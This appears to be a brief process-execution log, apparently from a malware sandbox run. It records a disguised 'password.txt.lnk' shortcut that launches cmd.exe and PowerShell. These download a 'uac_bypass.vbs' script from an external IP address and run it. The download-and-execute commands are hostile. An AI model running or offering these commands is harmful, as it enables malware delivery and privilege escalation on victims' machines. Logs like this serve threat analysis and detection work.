cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "ntkaP" C:\Users\test22\AppData\Local\Temp\password.txt.lnk
2556cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe iwr -outf C:\Users\test22\AppData\Local\Temp\\bypass.vbs http://212.57.37.63/uac_bypass.vbs & C:\Users\test22\AppData\Local\Temp\\bypass.vbs
2644powershell.exe powershell.exe iwr -outf C:\Users\test22\AppData\Local\Temp\\bypass.vbs http://212.57.37.63/uac_bypass.vbs
2752